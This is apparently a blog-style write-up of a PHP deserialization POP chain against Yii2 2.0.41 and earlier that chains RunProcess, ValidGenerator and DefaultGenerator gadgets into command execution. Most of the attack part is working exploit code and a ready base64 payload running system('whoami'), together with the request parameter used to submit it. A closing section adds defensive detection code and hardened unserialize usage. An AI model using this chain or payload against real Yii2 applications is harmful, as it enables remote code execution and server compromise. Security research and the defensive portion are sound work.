Preface: reinforcing the POP chain
Affected versions: yii2 version <= 2.0.41
When setting up the environment, if you hit "Unable to verify your data submission", just add public $enableCsrfValidation = false; in the corresponding controller to turn off CSRF validation.
Looking through the __destruct methods, the only one that seems usable is in the RunProcess class; the other classes basically all define a __wakeup that restricts deserialization.
Following into the stopProcess function, shown below, $this->processes is controllable, so $process is controllable as well, and therefore $process->isRunning() can invoke the __call method of an arbitrary class.
Next we need a __call method that meets our needs: the __call method in the ValidGenerator class. As can be seen, the $this->generator, $this->validator and $this->maxRetries variables can all be controlled; if $res can be controlled too, then a command can be executed.
Through this line, $res = call_user_func_array([$this->generator, $name], $arguments); we then need one more __call method that returns a value into $res; the one used here is in the DefaultGenerator class.
Constructing the EXP:
The first class used is RunProcess, in the Codeception\Extension namespace. $this->processes is controllable and needs to hold a ValidGenerator object, whose constructor parameters also need to be controlled.
namespace Codeception\Extension;

use Faker\ValidGenerator;

class RunProcess
{
    private $processes = [];

    function __construct($command, $argv)
    {
        $this->processes[] = new ValidGenerator($command, $argv);
    }
}
The second part is the ValidGenerator and DefaultGenerator classes, both in the Faker namespace. All three properties of ValidGenerator need to be controlled: $this->generator must hold a DefaultGenerator object, and the DefaultGenerator constructor parameter is the command to execute.
namespace Faker;

class DefaultGenerator
{
    protected $default;

    function __construct($argv)
    {
        $this->default = $argv;
    }
}

class ValidGenerator
{
    protected $generator;
    protected $validator;
    protected $maxRetries;

    function __construct($command, $argv)
    {
        $this->generator = new DefaultGenerator($argv);
        $this->validator = $command;
        $this->maxRetries = 99999999;
    }
}
The final EXP is as follows:
<?php
namespace Faker;

class DefaultGenerator
{
    protected $default;

    function __construct($argv)
    {
        $this->default = $argv;
    }
}

class ValidGenerator
{
    protected $generator;
    protected $validator;
    protected $maxRetries;

    function __construct($command, $argv)
    {
        $this->generator = new DefaultGenerator($argv);
        $this->validator = $command;
        $this->maxRetries = 99999999;
    }
}

namespace Codeception\Extension;

use Faker\ValidGenerator;

class RunProcess
{
    private $processes = [];

    function __construct($command, $argv)
    {
        $this->processes[] = new ValidGenerator($command, $argv);
    }
}

$exp = new RunProcess('system', 'whoami');
echo base64_encode(serialize($exp));
// TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
This POP chain is fairly simple; the payload is submitted as follows:
code=TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
Having analysed this far, I can't help sighing at how good the experts are. I went through the wakeup and destruct methods of the yii2 framework myself and feel there is basically nothing left to exploit; who knows whether more will turn up later..
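From the defender's side, the chain above is visible in the serialized data itself, because PHP writes every object's class name in clear text. The following is an added example, not code from the original post or from Yii2, Codeception or Faker: it flags the three gadget class names before unserialize() is ever called, and shows the hardened unserialize() call that stops RunProcess::__destruct from running at all. The function names findGadgetClasses and safeUnserialize, and the sample payload, are assumptions made for this example.

```php
<?php
// Added defensive example, not from the original post: flag the gadget class
// names the chain above relies on before data reaches unserialize(), and show
// the hardened unserialize() call that neutralises the chain entirely.

// Class names that make up the RunProcess -> ValidGenerator -> DefaultGenerator chain.
const GADGET_CLASSES = [
    'Codeception\Extension\RunProcess',
    'Faker\ValidGenerator',
    'Faker\DefaultGenerator',
];

// Return the gadget class names found in a serialized string. Accepts the raw
// serialized form or its base64 encoding (as sent in the code= parameter).
// PHP serializes objects as  O:<len>:"<class>":<n>:{...}  so the class names
// are visible in clear text even when the properties are private or protected.
function findGadgetClasses(string $data): array
{
    $decoded = base64_decode($data, true);
    if ($decoded !== false && preg_match('/^[OaCsibdN]:/', $decoded)) {
        $data = $decoded;
    }
    preg_match_all('/O:\d+:"([^"]+)"/', $data, $m);
    $found = array_intersect($m[1], GADGET_CLASSES);
    return array_values(array_unique($found));
}

// Hardened unserialize(): with allowed_classes => false (PHP >= 7.0) every
// object is restored as __PHP_Incomplete_Class, so RunProcess::__destruct
// never runs and the __call methods of ValidGenerator and DefaultGenerator
// are never reached. Prefer JSON over serialize() for untrusted input.
function safeUnserialize(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// Constructed sample (hypothetical): a RunProcess object with an empty
// processes array; private property names carry NUL bytes around the class name.
$sample = "O:32:\"Codeception\\Extension\\RunProcess\":1:{"
    . "s:43:\"\0Codeception\\Extension\\RunProcess\0processes\";a:0:{}}";

var_dump(findGadgetClasses($sample));
var_dump(findGadgetClasses(base64_encode($sample)));
var_dump(safeUnserialize($sample) instanceof __PHP_Incomplete_Class);
```

The same class-name check can be applied to any request parameter that is later passed to unserialize(), which is where the Yii2 version range given at the top of this post matters.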